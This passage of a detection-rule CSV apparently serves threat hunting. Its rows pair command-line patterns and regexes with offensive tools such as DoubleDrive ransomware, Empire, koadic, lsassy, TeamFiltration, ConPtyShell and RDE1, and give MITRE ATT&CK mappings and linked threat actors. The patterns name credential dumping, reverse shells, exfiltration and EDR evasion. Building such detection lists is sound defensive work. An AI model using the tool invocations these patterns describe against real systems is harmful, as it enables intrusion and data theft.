--command-uac-bypass*",".{0,1000}\s\-\-command\-uac\-bypass.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","663" "* common_pass.txt*",".{0,1000}\scommon_pass\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","664" "* 
ComputerDefaults.exe*",".{0,1000}\sComputerDefaults\.exe.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","665" "* -ComputerName -ServiceEXE *",".{0,1000}\s\-ComputerName\s\-ServiceEXE\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","666" "* comsvcs_stealth.py*",".{0,1000}\scomsvcs_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","667" "* ComunicationC2.cpp*",".{0,1000}\sComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data 
Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","668" "* --config * --just-clean --cleaning-file *",".{0,1000}\s\-\-config\s.{0,1000}\s\-\-just\-clean\s\-\-cleaning\-file\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","669" "* --config *.json --debug --exfil --onedrive*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-debug\s\-\-exfil\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","670" "* --config *.json --enum --validate-msol --usernames *",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-enum\s\-\-validate\-msol\s\-\-usernames\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","671" "* --config *.json --enum --validate-teams*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-enum\s\-\-validate\-teams.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, 
exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","672" "* --config *.json --exfil --aad*",".{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-exfil\s\-\-aad.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","673" "* -config modlishka.json *",".{0,1000}\s\-config\smodlishka\.json\s.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1557 - T1071 - T1583 - T1213","TA0001 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","0","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","674" "* configdhcpserver.sh*",".{0,1000}\sconfigdhcpserver\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","676" "* Configure-Victim.ps1*",".{0,1000}\sConfigure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","677" "* Configuring Windows Firewall rules to block EDR network access*",".{0,1000}\sConfiguring\sWindows\sFirewall\srules\sto\sblock\sEDR\snetwork\saccess.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","678" "* ConfuserEx.exe*",".{0,1000}\sConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 
Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","679" "* --confuserex-args *",".{0,1000}\s\-\-confuserex\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","680" "* --confuserex-module *",".{0,1000}\s\-\-confuserex\-module\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","681" "* --confuserex-modules-in-dir *",".{0,1000}\s\-\-confuserex\-modules\-in\-dir\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","682" "* --confuserex-path *",".{0,1000}\s\-\-confuserex\-path\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","683" "* --confuserex-project-file 
*",".{0,1000}\s\-\-confuserex\-project\-file\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","684" "* --confuserex-save-generated-project-file *",".{0,1000}\s\-\-confuserex\-save\-generated\-project\-file\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","685" "* --connection-min-idle * ws://*",".{0,1000}\s\-\-connection\-min\-idle\s.{0,1000}\sws\:\/\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","690" "* ConPtyShell*",".{0,1000}\sConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","691" "* -consoleoutput -browsercredentials*",".{0,1000}\s\-consoleoutput\s\-browsercredentials.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - 
TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","692" "* -consoleoutput -DomainRecon*",".{0,1000}\s\-consoleoutput\s\-DomainRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","693" "* -consoleoutput -Localrecon*",".{0,1000}\s\-consoleoutput\s\-Localrecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","694" "* -ConType bind *",".{0,1000}\s\-ConType\sbind\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Vnc.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","695" "* -ConType reverse *",".{0,1000}\s\-ConType\sreverse\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-Vnc.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","696" "* --convert_idrsa_pub --publickey $HOME/.ssh/id_rsa.pub*",".{0,1000}\s\-\-convert_idrsa_pub\s\-\-publickey\s\$HOME\/\.ssh\/id_rsa\.pub.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","697" "* 
ConvertToShellcode.py*",".{0,1000}\sConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","698" "* --copy-file --source-file *.docx --target-file *.docx --target-volume *",".{0,1000}\s\-\-copy\-file\s\-\-source\-file\s.{0,1000}\.docx\s\-\-target\-file\s.{0,1000}\.docx\s\-\-target\-volume\s.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","699" "* core.payload *",".{0,1000}\score\.payload\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","700" "* core.stager *",".{0,1000}\score\.stager\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","701" "* Corrupt_AMSI.py*",".{0,1000}\sCorrupt_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","702" "* Corrupt_AMSI.vba*",".{0,1000}\sCorrupt_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","703" "* couchdb-databases.nse*",".{0,1000}\scouchdb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","704" "* couchdb-stats.nse*",".{0,1000}\scouchdb\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","705" "* --crack * --ntds*",".{0,1000}\s\-\-crack\s.{0,1000}\s\-\-ntds.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","706" "* crack_list client_wordlists.py*",".{0,1000}\scrack_list\sclient_wordlists\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","707" "* crack_list cracklist_api.py*",".{0,1000}\scrack_list\scracklist_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An 
offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","708" "* crack_list dictionary.py*",".{0,1000}\scrack_list\sdictionary\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","709" "* crack_list wordlist.py*",".{0,1000}\scrack_list\swordlist\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","710" "* --crack-status*",".{0,1000}\s\-\-crack\-status.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","711" "* --crawl=*",".{0,1000}\s\-\-crawl\=.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","712" "* crawler.py -u http*",".{0,1000}\scrawler\.py\s\-u\shttp.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information 
possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","0","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","713" "* crde_arm_musl https -*",".{0,1000}\scrde_arm_musl\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","714" "* crde_armv7 https -*",".{0,1000}\scrde_armv7\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","715" "* crde_debug https -*",".{0,1000}\scrde_debug\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","716" "* crde_linux https -*",".{0,1000}\scrde_linux\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","717" "* 
